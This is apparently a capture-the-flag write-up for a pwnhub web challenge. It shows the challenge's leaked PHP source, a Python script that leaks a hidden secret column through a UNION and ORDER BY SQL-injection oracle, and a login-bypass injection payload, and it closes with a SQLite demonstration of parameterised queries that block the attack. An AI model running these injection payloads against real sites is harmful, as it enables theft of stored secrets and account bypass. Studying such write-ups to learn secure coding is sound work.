pwnhub Member Day

Too much of a noob, missed out on 5k

Start with a directory scan, which turns up register.php. Register an account and you land on profile.php?id=xx; id=2 shows the hint thisissource.php, so download the source and audit it.
The login and registration code filters single quotes and backslashes:

```php
if(strlen($username) < 3 or preg_match("|'|",$username) or preg_match("|\\\\|",$username))
```

Then in profile.php, id only filters `. ( ) _`, so a subquery is still possible: id=0 union select 1,2,3,4,5 shows that column 2 is rendered. I then went down a rabbit hole and spent a whole night injecting without getting anywhere.

Reading the source again later, I found:

```sql
CREATE TABLE `users` (
  `id` int(5) NOT NULL AUTO_INCREMENT,
  `user` varchar(20) DEFAULT NULL,
  `pass` varchar(32) DEFAULT NULL,
  `$secret` varchar(36) DEFAULT NULL,
  `count` int(3) DEFAULT NULL,
  PRIMARY KEY (`id`)
)
```

$secret is the 4th column. After a senior's tip that ORDER BY injection would work, I remembered a trick from an old blog post.
There is a limit on the number of queries, though:

```php
if($row['count'] == 140)
{

    if(mysql_query("update users set $secret='{$duihuanma}' where user='$username';"))
    {
        mysql_query("update users set count=0 where user='$username';");
        die("<center><br><h3>尝试次数过多,兑换码已经重置</h3></center>");
    }
    return $duihuanma;
}
```

But the username here comes from the session, so you can register two accounts, a main one and a throwaway. Use the throwaway's session to brute-force the main account's id: the throwaway's $secret keeps getting reset while the main account's stays untouched.
So, the script:

```python
import requests
import hashlib
import random

url = 'http://54.223.59.178/profile.php?id='
cookie = {'PHPSESSID': '03faiapvojtao8uhs323venhd4'}  # session of the throwaway account
# candidate characters; the trailing '{' is a sentinel that sorts after 'z'
string = '0123456789abcdefghijklmnopqrstuvwxyz{'

# characters recovered so far (resumed from an earlier run)
ch = 'apohnw4bjlyr62qicd5f18zexkt9vu7gm3'

for i in range(36):
    for k in range(37):
        # inject a row whose 4th column is the current guess and sort on it;
        # the real (id=29) row is rendered first only when its secret sorts before the guess
        payload = '29 union select 1,2,3,\'' + ch + string[k] + '\',5 order by 4'
        resp = requests.get(url=url + payload, cookies=cookie)
        # print(resp.text)
        if 'hammer' in resp.text:
            # first guess that sorts after the secret: the previous character is the right one
            ch = ch + string[k - 1]
            print(ch)
            break
    if len(ch) == 36:
        break


# brute-force a 4-character string whose md5 starts with ee3c
while 1:
    s = ''.join(random.sample('qwertyuiopasdfghjklzxcvbnm1234567890', 4))
    if hashlib.md5(s.encode('utf_8')).hexdigest()[0:4] == 'ee3c':
        print(s)
        break
```

The script isn't very stable; when a run goes wrong, drop the last character and rerun, and it works.

EOF

You can actually also inject through password, which isn't filtered at all:

```php
$sql = "select id,user from users where user = '$username' and pass = md5('$password')";
```

So the payload: username=ashdasohdia&password=1') union select d,1 from (select 1 as a,2 as b,3 as c,4 as d,5 as f from users where id = 0 union select * from users where id = 29) as a%23
username has to be random garbage so that the lookup doesn't match a real user.
The id in the 302 redirect then contains $secret.
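Added example, not from the write-up and not the challenge's code: the profile.php lookup and the login query rebuilt on an in-memory SQLite table with the write-up's schema (the challenge ran MySQL; SQLite is assumed here so it runs offline). The vulnerable profile lookup keeps the `. ( ) _` blacklist and raw string concatenation; the hardened versions cast id to int and bind every value. The ORDER BY oracle from the script above is replayed against both to show that the blacklist does not stop it while a bound parameter does. The row with id 29, user `hammer` and secret `ab12c` is constructed sample data.

```python
import hashlib
import sqlite3

# Same alphabet and '{' sentinel as the write-up's script.
ALPHABET = '0123456789abcdefghijklmnopqrstuvwxyz{'
# Characters profile.php strips from id, per the write-up.
BLOCKED = set('.()_')


def make_db():
    """In-memory copy of the write-up's users table with constructed rows."""
    db = sqlite3.connect(':memory:')
    db.execute("""CREATE TABLE `users` (
        `id` INTEGER PRIMARY KEY,
        `user` varchar(20),
        `pass` varchar(32),
        `$secret` varchar(36),
        `count` int(3))""")
    db.executemany("INSERT INTO users VALUES (?,?,?,?,?)", [
        (1, 'alice', hashlib.md5(b'alice-pw').hexdigest(), 'zz9', 0),
        (29, 'hammer', hashlib.md5(b'hammer-pw').hexdigest(), 'ab12c', 0),  # constructed secret
    ])
    return db


def profile_vulnerable(db, id_param):
    """profile.php as described: a short blacklist, then raw concatenation into SQL.
    Returns the `user` column of the first row, which is what the page renders."""
    if any(c in BLOCKED for c in id_param):
        return None
    sql = "select `id`,`user`,`pass`,`$secret`,`count` from users where id=" + id_param
    row = db.execute(sql).fetchone()
    return str(row[1]) if row else None


def profile_hardened(db, id_param):
    """Same lookup with id cast to int and passed as a bound parameter."""
    try:
        uid = int(id_param)
    except ValueError:
        return None
    row = db.execute("select `user` from users where id=?", (uid,)).fetchone()
    return str(row[0]) if row else None


def leak_secret(lookup, db, victim_id, victim_user, length):
    """Replay the write-up's ORDER BY oracle against a lookup function.
    The injected row carries the guess in column 4; ORDER BY 4 puts the real row
    first exactly when the real secret sorts before the guess, so the previous
    alphabet character is the next character of the secret."""
    known = ''
    for _ in range(length):
        for k, c in enumerate(ALPHABET):
            payload = f"{victim_id} union select 1,2,3,'{known + c}',5 order by 4"
            if lookup(db, payload) == victim_user:
                known += ALPHABET[k - 1]
                break
        else:
            break  # the oracle never fired: nothing is being leaked
    return known


def login_hardened(db, username, password):
    """Login query with both values bound: the ') union ... # string from the
    write-up is just a password here. md5 is kept only to match the table
    layout; a real system would use a password hash such as bcrypt."""
    digest = hashlib.md5(password.encode()).hexdigest()
    row = db.execute("select `id` from users where `user`=? and `pass`=?",
                     (username, digest)).fetchone()
    return row[0] if row else None


if __name__ == '__main__':
    db = make_db()
    print('vulnerable profile leaks:', leak_secret(profile_vulnerable, db, 29, 'hammer', 5))
    print('hardened profile leaks:  ', repr(leak_secret(profile_hardened, db, 29, 'hammer', 5)))
```

The blacklist is the wrong control: none of `. ( ) _` appear in the oracle payload, so it passes untouched, while `int()` plus a bound parameter rejects it before any SQL is built. The same applies to the login query; with bound parameters the closing-quote-and-union trick is stored and compared as an ordinary (failing) password.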
thisissourcecode.zip